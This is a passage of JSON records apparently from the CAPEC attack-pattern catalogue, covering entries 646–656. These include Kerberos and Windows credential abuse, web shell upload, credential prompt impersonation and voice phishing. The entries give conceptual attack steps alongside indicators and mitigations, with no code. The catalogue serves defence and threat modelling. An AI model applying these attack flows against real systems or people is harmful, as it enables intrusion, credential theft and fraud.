[REF-584]"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"294"},{"CWE_ID":"308"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.003","Entry_Name":"Use Alternate Authentication Material:Pass The Ticket"}},"References":{"Reference":{"External_Reference_ID":"REF-584"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}}},"646":{"ID":"646","Name":"Peripheral Footprinting","Abstraction":"Standard","Status":"Stable","Description":"Adversaries may attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary needs either physical or remote access to the victim system."},"Skills_Required":{"Skill":["The adversary needs to be able to infect the victim system in a manner that gives them remote access.",{"Level":"Medium"},"If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1120","Entry_Name":"Peripheral Device Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required"}]}},"647":{"ID":"647","Name":"Collect Data from Registries","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Gain logical access to system] An adversary must first gain logical access to the system it wants to gather registry information from,","Technique":["Obtain user account credentials and access the system","Plant malware on the system that will give remote logical access to the adversary"]},{"Step":"2","Phase":"Experiment","Description":"[Determine if the permissions are correct] Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means"},{"Step":"3","Phase":"Experiment","Description":"[Peruse registry for information] Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful."},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":["The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).","The adversary must have capability to navigate the operating system to peruse the registry."]},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to read sensitive information about the system in the registry."}},"Mitigations":{"Mitigation":["Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.","Employ robust identification and audit/blocking via using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.002","Entry_Name":"Unsecured Credentials:Credentials in Registry"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1005","Entry_Name":"Data from Local System"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"648":{"ID":"648","Name":"Collect Data from Screen Capture","Abstraction":"Detailed","Status":"Draft","Description":"An adversary gathers sensitive information by exploiting the system\'s screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)."},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to capture potentially sensitive information and processes as they appear on the screen."}},"Mitigations":{"Mitigation":["Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.","While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1113","Entry_Name":"Screen Capture"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"}]}},"649":{"ID":"649","Name":"Adding a Space to a File Extension","Abstraction":"Detailed","Status":"Draft","Description":"An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"635"}},"Prerequisites":{"Prerequisite":"The use of the file must be controlled by the file extension."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"File extensions should be checked to see if non-visible characters are being included."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"46"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1036.006","Entry_Name":"Masquerading:Space after Filename"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"650":{"ID":"650","Name":"Upload a Web Shell to a Web Server","Abstraction":"Detailed","Status":"Draft","Description":"By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \\"gateway\\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":"The web server is susceptible to one of the various web application exploits that allows for uploading a shell file."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.","Ensure that the file permissions in directories on the web server from which files can be execute is set to the \\"least privilege\\" settings, and that those directories contents is controlled by an allowlist."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"553"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1505.003","Entry_Name":"Server Software Component:Web Shell"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"651":{"ID":"651","Name":"Eavesdropping","Abstraction":"Standard","Status":"Draft","Description":"An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"117"}},"Prerequisites":{"Prerequisite":"The adversary typically requires physical proximity to the target\'s environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally."},"Resources_Required":{"Resource":"For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"The adversary gains unauthorized access to information."}},"Mitigations":{"Mitigation":["Be mindful of your surroundings when discussing sensitive information in public areas.","Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.","If possible, physically disable the microphone on your machine if it is not needed."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"652":{"ID":"652","Name":"Use of Known Kerberos Credentials","Abstraction":"Standard","Status":"Draft","Description":"An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain. Kerberos is the default authentication method for Windows domains and is utilized for numerous authentication purposes. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the Windows domain or access to any resources the service account is privileged to access, among other things. Kerberos credentials can be obtained by an adversary via methods such as system breaches, network sniffing attacks, and/or brute force attacks against the Kerberos service account or the hash of a service ticket. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Kerberos credentials] The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.","Technique":["An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.","An adversary guesses the credentials to a weak Kerberos service account.","An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.","An adversary conducts a Kerberoasting attack."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt Kerberos authentication] Try each Kerberos credential against various resources within the domain until the target grants access.","Technique":["Manually or automatically enter each Kerberos service account credential through the target\'s interface.","Attempt a Pass the Ticket attack."]},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain and leverages Kerberos authentication.","The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.","The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.","The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.","The targeted network allows for network sniffing attacks to succeed."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Kerberos credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A valid Kerberos ticket or a known Kerberos service account credential."},"Indicators":{"Indicator":["Authentication attempts use expired or invalid credentials.","Authentication attempts are originating from IP addresses or locations that are inconsistent with an account\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.","Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse Kerberos service account credentials across systems.","Deny remote use of Kerberos service account credentials to log into domain systems.","Do not allow Kerberos service accounts to be a local administrator on more than one system.","Enable at least AES Kerberos encryption for tickets.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]","PowerSploit\'s Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"294"},{"CWE_ID":"836"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1558","Entry_Name":"Steal or Forge Kerberos Tickets"}},"References":{"Reference":[{"External_Reference_ID":"REF-584"},{"External_Reference_ID":"REF-585"},{"External_Reference_ID":"REF-586"}]},"Notes":{"Note":["Kerberos centers around a ticketing system that is used to request/grant access to resources and to then access the requested resources. If one of these tickets is acquired, an adversary could gain access to a specific resource; access any resource a user has privileges to access; gain access to services that use Kerberos as an authentication mechanism and generate tickets to access a particular resource and the system that hosts the resource; or generate Ticket Granting Tickets (TGTs) for any domain account within Active Directory.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes, Related_Attack_Patterns"}}},"653":{"ID":"653","Name":"Use of Known Windows Credentials","Abstraction":"Standard","Status":"Draft","Description":"An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows domain credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the domain, under the guise of an authenticated user or service. Attacks leveraging trusted Windows credentials typically result in the adversary laterally moving within the local Windows network, since users are often allowed to login to systems/applications within the domain using their Windows domain password. This domain authentication can occur directly (user typing in their password or PIN) or via Single Sign-On (SSO) or cloud-based authentication, which often don\'t verify the authenticity of the user\'s input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data. Utilizing known Windows credentials, an adversary can obtain sensitive data from administrator shares, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more. Ultimately, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows credentials] The adversary must obtain known Windows credentials in order to access the target system, application, or service within the domain.","Technique":["An adversary purchases breached Windows username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal Windows credentials as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows credential against various systems, applications, and services within the domain until the target grants access.","Technique":"Manually or automatically enter each credential through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known Windows user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A list of known Windows credentials for the targeted domain.","A custom script that leverages a Windows credential list to launch an attack."]},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with a user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]","Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"}]},"References":{"Reference":[{"External_Reference_ID":"REF-575"},{"External_Reference_ID":"REF-576"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"654":{"ID":"654","Name":"Credential Prompt Impersonation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user\'s credentials. The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt. A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"504"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine suitable tasks to exploit] Determine what tasks exist on the target system that may result in a user providing their credentials.","Technique":"Determine what tasks prompt a user for their credentials."},{"Step":"2","Phase":"Exploit","Description":"[Impersonate Task] Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.","Technique":"Prompt a user for their credentials, while making the user believe the credential request is legitimate."}]},"Prerequisites":{"Prerequisite":["The adversary must already have access to the target system via some means.","A legitimate task must exist that an adversary can impersonate to glean credentials."]},"Skills_Required":{"Skill":["Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult.",{"Level":"Low"}]},"Resources_Required":{"Resource":["Malware or some other means to initially comprise the target system.","Additional malware to impersonate a legitimate credential prompt."]},"Indicators":{"Indicator":"Credential prompts that appear illegitimate or unexpected."},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help."},"Example_Instances":{"Example":["An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user\'s Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user\'s encrypted email.","An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"655":{"ID":"655","Name":"Avoid Security Tool Identification by Adding Data","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.","In addition to this, adding data to a file also changes the file\'s hash, frustrating security tools that look for known bad files by their hash."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"572"}},"Consequences":{"Consequence":[{"Scope":"Accountability","Impact":["Hide Activities","Bypass Protection Mechanism"]},{"Scope":"Integrity","Impact":"Modify Data"}]},"Example_Instances":{"Example":{"p":"Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1027.001","Entry_Name":"Obfuscated Files or Information:Binary padding"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"}}},"656":{"ID":"656","Name":"Voice Phishing","Abstraction":"Detailed","Status":"Stable","Description":"An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn\'t typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \\"cold call\\" or by the victim if calling an illegitimate telephone number.","Alternate_Terms":{"Alternate_Term":[{"Term":"Vishing"},{"Term":"VoIP Phishing"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate organization\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization\'s website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to provide sensitive information to the adversary.] An adversary \\"cold calls\\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":"Call the user a from a spoofed legitimate-looking telephone number."},{"Step":"4","Phase":"Exploit","Description":"[Use stolen information] Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim\'s bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.","Technique":"Login to the legitimate site using another the victim\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.","An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.","If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business 